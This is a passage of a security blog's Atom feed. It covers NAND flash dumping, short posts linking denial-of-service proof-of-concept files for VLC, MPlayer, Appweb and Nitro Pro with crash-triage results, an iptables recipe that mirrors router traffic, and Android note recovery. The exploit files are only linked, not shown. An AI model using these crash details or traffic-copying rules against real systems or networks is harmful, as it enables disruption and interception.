&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQIOd88qwW5hWQjN_toD4jMuOvRdoAnE528e7XXOd_JilinrygAWdZWIqVb-BAixZIzEkE5sHGT7RQ681wZOpcEdSCuXamCZLWd_gpaG33FKoothWOxRurQyg4c3AkGuooCWhzbsNvRdI/s1600/05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;195&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQIOd88qwW5hWQjN_toD4jMuOvRdoAnE528e7XXOd_JilinrygAWdZWIqVb-BAixZIzEkE5sHGT7RQ681wZOpcEdSCuXamCZLWd_gpaG33FKoothWOxRurQyg4c3AkGuooCWhzbsNvRdI/s400/05.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Now when I rerun Binwalk I get a more of an expected output:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdh9cyqTWyCEJvRLHogaBIRDf4RaoT37YW8EEbpVTGcrPP5M6Sg-gXC672gN2U1IEZONUk3FQ8fRgeDYbfS3fK3zyuWDJDVlh1HhgG4cnOC5Ir-3AeKX5NIngasNKlJDV2Ng07-tuivUU/s1600/06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;97&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdh9cyqTWyCEJvRLHogaBIRDf4RaoT37YW8EEbpVTGcrPP5M6Sg-gXC672gN2U1IEZONUk3FQ8fRgeDYbfS3fK3zyuWDJDVlh1HhgG4cnOC5Ir-3AeKX5NIngasNKlJDV2Ng07-tuivUU/s400/06.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div&gt;
Next I tried using Binwalks automatic extract parameter but it was unable to extract anything meaningful. So instead I decided to manually carve the JFFS2 file-system from the dump:&lt;br /&gt;
&lt;br /&gt;
I used a block size of 1 and skipped to the beginning of the JFFS2 area as listed in the previous Binwalk output.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwGEtTix3RbzdhPbzyxVUdUyMI-Pw-TAHyO7UwOXrfTJ2UJmdYGn33STFzUGimiCCG0VeYbWVTzZ_g0FzGZZzL0BYaZ845hW_JbK0adYvwEJfs4TPXHy8_1ETpP6IUEfoeAVx-Rl7W63A/s1600/07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;71&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwGEtTix3RbzdhPbzyxVUdUyMI-Pw-TAHyO7UwOXrfTJ2UJmdYGn33STFzUGimiCCG0VeYbWVTzZ_g0FzGZZzL0BYaZ845hW_JbK0adYvwEJfs4TPXHy8_1ETpP6IUEfoeAVx-Rl7W63A/s400/07.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
From here I tried various tools (Binwalk, jffs2dump, etc) to extract the contents of the JFFS2 file-system without success, so instead I resorted to mounting it directly:&lt;br /&gt;
&lt;br /&gt;
I used nandsim to create a virtual device, and supplied it the first 4 bytes from the ID I previously discovered.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3z69tV7AtVqtXeHNNI7xUmt2lh2D2ckdh8zU5iFWjKNIj5QIUvDMRuEd01SjXa2XXlfFakvt7FtbTs7HaIJFI0n3fvNhl1uHZLsiXuIiPfA2ko8kg7fTinsH6zoUu4oOzsQRfViFCT4/s1600/08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;70&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3z69tV7AtVqtXeHNNI7xUmt2lh2D2ckdh8zU5iFWjKNIj5QIUvDMRuEd01SjXa2XXlfFakvt7FtbTs7HaIJFI0n3fvNhl1uHZLsiXuIiPfA2ko8kg7fTinsH6zoUu4oOzsQRfViFCT4/s400/08.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
From here the file-system was successfully mounted:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFNSEmPwKpgXJSVJnz8uIc_iS48Pl4CblUxvM4mVHXXfI3_3REO55UzloOanaYfOPDybCU7t7URWFDpCDOYWvVw2c80tuC3Dbej0MHq1FR89w0euFfBvlszuMwcfIwXPtA5GIbt3ZsgY8/s1600/09.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;288&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFNSEmPwKpgXJSVJnz8uIc_iS48Pl4CblUxvM4mVHXXfI3_3REO55UzloOanaYfOPDybCU7t7URWFDpCDOYWvVw2c80tuC3Dbej0MHq1FR89w0euFfBvlszuMwcfIwXPtA5GIbt3ZsgY8/s400/09.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/2083150665208361879/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2016/06/adventures-into-nand-dumping-part-1.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/2083150665208361879'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/2083150665208361879'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2016/06/adventures-into-nand-dumping-part-1.html' title='Adventures into NAND Dumping Part 1'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhLIVJHhPiwQb3oqCxhxs88Dir4_cHFHYOsqAC3LDcTYLAsEkKEVwMJxN-ARr5mf2dF-QFqI78AbiwQJ0SJtVe_EawxLq_hVJl0nl5AAmfqdYT1HY2KJZ5fbla5REHXS3ZSk4INpCquo/s72-c/IMG_20160612_220236.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-5367094491500247719</id><published>2014-05-11T12:17:00.001+00:00</published><updated>2016-06-12T20:27:00.567+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="DoS"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploitability Classification: UNKNOWN"/><category scheme="http://www.blogger.com/atom/ns#" term="VLC"/><category scheme="http://www.blogger.com/atom/ns#" term="WAV"/><title type='text'>VLC Media Player 2.1.3 - .WAV DoS POC</title><content type='html'>VLC Media Player (2.1.3 Rincewind) - .WAV DoS Exploit:
&lt;br /&gt;
&lt;br /&gt;
!exploitable results:&lt;br /&gt;

&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: x-small;&quot;&gt;Exploitability Classification: UNKNOWN&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: x-small;&quot;&gt;Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at msvcrt!strcspn+0x000000000000002d (Hash=0x0c543936.0x0c29261d)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: x-small;&quot;&gt;The data from the faulting address is later used to determine whether or not a branch is taken.&lt;/span&gt;
&lt;/blockquote&gt;

&lt;div&gt;Download &lt;a href=&quot;http://www.nobytes.com/exploits/nobytes31.txt&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/5367094491500247719/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2014/05/vlc-media-player-wav-dos-poc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5367094491500247719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5367094491500247719'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2014/05/vlc-media-player-wav-dos-poc.html' title='VLC Media Player 2.1.3 - .WAV DoS POC'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-4916830097396866632</id><published>2014-05-10T15:06:00.001+00:00</published><updated>2014-05-11T12:26:31.325+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="DoS"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploitability Classification: PROBABLY_EXPLOITABLE"/><category scheme="http://www.blogger.com/atom/ns#" term="MPlayer"/><category scheme="http://www.blogger.com/atom/ns#" term="WAV"/><title type='text'>MPlayer (05/03/2014) - .WAV DoS POC</title><content type='html'>MPlayer&amp;nbsp;[05/03/2014] (MPlayer-x86_64-r37182+g09725c1) - .WAV DoS Exploit:&lt;br /&gt;
&lt;br /&gt;
!exploitable results:&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;Exploitability Classification: PROBABLY_EXPLOITABLE&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;Recommended Bug Title: Probably Exploitable - Data Execution Prevention Violation near NULL starting at Unknown Symbol @ 0x0000000000000008 called from Unknown Symbol @ 0x00000000067f2340 (Hash=0x48484848.0x53535353)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;User mode DEP access violations are probably exploitable if near NULL.&lt;/span&gt;&lt;/blockquote&gt;
&lt;div&gt;
Download &lt;a href=&quot;http://www.nobytes.com/exploits/nobytes30.txt&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/4916830097396866632/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2014/05/mplayer-0day-dos-poc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/4916830097396866632'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/4916830097396866632'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2014/05/mplayer-0day-dos-poc.html' title='MPlayer (05/03/2014) - .WAV DoS POC'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-1249852227143380612</id><published>2013-02-22T18:35:00.001+00:00</published><updated>2014-05-11T12:26:41.456+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="DoS"/><category scheme="http://www.blogger.com/atom/ns#" term="Embedthis Appweb"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploitability Classification: UNKNOWN"/><title type='text'>Embedthis Appweb 4.2.0-0 - DoS POC</title><content type='html'>Embedthis Appweb 4.2.0-0 - DoS Exploit:&lt;br /&gt;
&lt;br /&gt;
!exploitable result:&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;Exploitability Classification: UNKNOWN&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at libmpr!mprSeekFile+0x000000000000000f (Hash=0x0c566765.0x0c1b6765)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;The data from the faulting address is later used to determine whether or not a branch is taken.&lt;/span&gt;&lt;/blockquote&gt;
&lt;div&gt;
Download &lt;a href=&quot;http://www.nobytes.com/exploits/nobytes29.txt&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/1249852227143380612/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2013/02/embedthis-appweb-420-0-0day-dos-poc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/1249852227143380612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/1249852227143380612'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2013/02/embedthis-appweb-420-0-0day-dos-poc.html' title='Embedthis Appweb 4.2.0-0 - DoS POC'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-5207976574842127316</id><published>2013-01-13T13:15:00.000+00:00</published><updated>2013-01-13T13:15:44.596+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="DD-WRT"/><category scheme="http://www.blogger.com/atom/ns#" term="IPTables"/><category scheme="http://www.blogger.com/atom/ns#" term="Sniffing"/><category scheme="http://www.blogger.com/atom/ns#" term="TAP"/><title type='text'>DD-WRT Network Sniffing</title><content type='html'>My DD-WRT router unfortunately does not have the option to create a TAP/Mirror Port, but using IPTables we can make a copy of all traffic and forward it to a IP:

&lt;br /&gt;
&lt;br /&gt;
SSH to your Router, in this case we are going to forward traffic to my IDS on: 192.168.1.200&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;iptables -A PREROUTING -t mangle -j ROUTE --gw 192.168.1.200 --tee&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;iptables -A POSTROUTING -t mangle -j ROUTE --gw 192.168.1.200 --tee&lt;/span&gt;&lt;/blockquote&gt;
To confirm the rules have been created we can run the following command:&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;iptables -L -t mangle&lt;/span&gt;&lt;/blockquote&gt;
To remove the rule we run the following command:&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;iptables -F -t mangle&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/blockquote&gt;
</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/5207976574842127316/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2013/01/dd-wrt-network-sniffing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5207976574842127316'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5207976574842127316'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2013/01/dd-wrt-network-sniffing.html' title='DD-WRT Network Sniffing'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-2659077557366913010</id><published>2012-10-18T19:26:00.002+00:00</published><updated>2014-05-11T12:26:49.019+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="AVI"/><category scheme="http://www.blogger.com/atom/ns#" term="DoS"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploitability Classification: UNKNOWN"/><category scheme="http://www.blogger.com/atom/ns#" term="VLC"/><title type='text'>VLC Media Player 2.0.3 - .AVI DoS POC</title><content type='html'>&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;VLC media player (2.0.3 Twoflower)&amp;nbsp;- .AVI DoS Exploit:&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;br /&gt;!exploitable result:&lt;/span&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;Exploitability Classification: UNKNOWN&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at KERNELBASE!lstrlenW+0x000000000000001a (Hash=0x2e3a5a04.0x79532c61)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Trebuchet MS, sans-serif; font-size: x-small;&quot;&gt;The data from the faulting address is later used to determine whether or not a branch is taken.&lt;/span&gt;&amp;nbsp;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;Download&amp;nbsp;&lt;a href=&quot;http://www.nobytes.com/exploits/nobytes28.txt&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/2659077557366913010/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2012/10/vlc-203-0day-dos-poc.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/2659077557366913010'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/2659077557366913010'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2012/10/vlc-203-0day-dos-poc.html' title='VLC Media Player 2.0.3 - .AVI DoS POC'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-5581365982117824719</id><published>2012-10-07T19:27:00.000+00:00</published><updated>2014-05-11T12:27:27.332+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="DoS"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploitability Classification: Exploitable"/><category scheme="http://www.blogger.com/atom/ns#" term="Nitro Pro"/><category scheme="http://www.blogger.com/atom/ns#" term="PDF"/><title type='text'>Nitro Pro 8.0.3.1 - .PDF DoS POC</title><content type='html'>&lt;span style=&quot;font-family: Trebuchet MS, sans-serif;&quot;&gt;New Nitro Pro 8 (8.0.3.1) PDF Reader - .PDF DoS Exploit:&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;!exploitable result:&lt;/span&gt;&lt;span style=&quot;font-family: Trebuchet MS, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Trebuchet MS, sans-serif;&quot;&gt;BUG_TITLE:Exploitable - User Mode Write AV starting at npdf!ProvideCoreHFT+0x000000000010886a (Hash=0x265b4f1d.0x020d4f2c)&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Trebuchet MS, sans-serif;&quot;&gt;EXPLANATION:User mode write access violations that are not near NULL are exploitable.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;Download &lt;a href=&quot;http://www.nobytes.com/exploits/nobytes27.txt&quot;&gt;Here&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/5581365982117824719/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2012/10/nitro-pro-8-0day-dos-poc.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5581365982117824719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5581365982117824719'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2012/10/nitro-pro-8-0day-dos-poc.html' title='Nitro Pro 8.0.3.1 - .PDF DoS POC'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-6698420375111103350</id><published>2012-03-10T16:44:00.012+00:00</published><updated>2012-03-10T17:28:59.708+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="android"/><category scheme="http://www.blogger.com/atom/ns#" term="colornote"/><category scheme="http://www.blogger.com/atom/ns#" term="forensics"/><category scheme="http://www.blogger.com/atom/ns#" term="recovery"/><title type='text'>Android ColorNote, notes recovery</title><content type='html'>&lt;span style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;So I decided to upgrade the custom Android ROM on my HTC HD2 (Leo), and totally forgot about some of the important notes I left in the Android app &lt;a href=&quot;https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&quot;&gt;ColorNote&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span&gt;Fortunately&lt;span style=&quot;font-size: 100%;&quot;&gt; before I upgraded my ROM, I made a backup using Clockwork Recovery Mod and saved it to my PC.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;So I put my forensics hat on and got to work:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;The backup consisted of the &lt;/span&gt;following&lt;span style=&quot;font-size: 100%;&quot;&gt; files:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span&gt;&lt;blockquote style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size:78%;&quot;&gt;&lt;code&gt;.android_secure.img&lt;br /&gt;boot.img&lt;br /&gt;cache.img&lt;br /&gt;data.img&lt;br /&gt;nandroid.md5&lt;br /&gt;recovery.img&lt;br /&gt;sd-ext.img&lt;br /&gt;system.img&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style=&quot;font-family: Georgia, serif; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size: 100%; &quot;&gt;The IMG files are using the Yet Another Flash File System (YAFFS).&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;A quick Google and I came &lt;/span&gt;across&lt;span style=&quot;font-size: 100%;&quot;&gt; &lt;a href=&quot;http://forum.xda-developers.com/showthread.php?t=851080&quot;&gt;this post&lt;/a&gt; on the XDA Devs Forums.&lt;br /&gt;(Download the attachment to the forum thread) &lt;/span&gt;&lt;span style=&quot;font-size: 100%; &quot;&gt;This is a Cygwin ported version of &#39;unyaffs&#39;.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%; &quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%; &quot;&gt;Next was to work out which IMG file to use... So I cheated and asked Android guru &lt;a href=&quot;https://twitter.com/#!/noobhands&quot;&gt;Noobhands&lt;/a&gt; who pointed me at the data.img (Thx dude!).&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%; &quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%; &quot;&gt;The &#39;unyaffs&#39; is simple to use:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%; &quot;&gt;&lt;blockquote&gt;unyaffs.exe data.img&lt;/blockquote&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size: 100%; &quot;&gt;This extracts the contents of the IMG to the current folder.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: 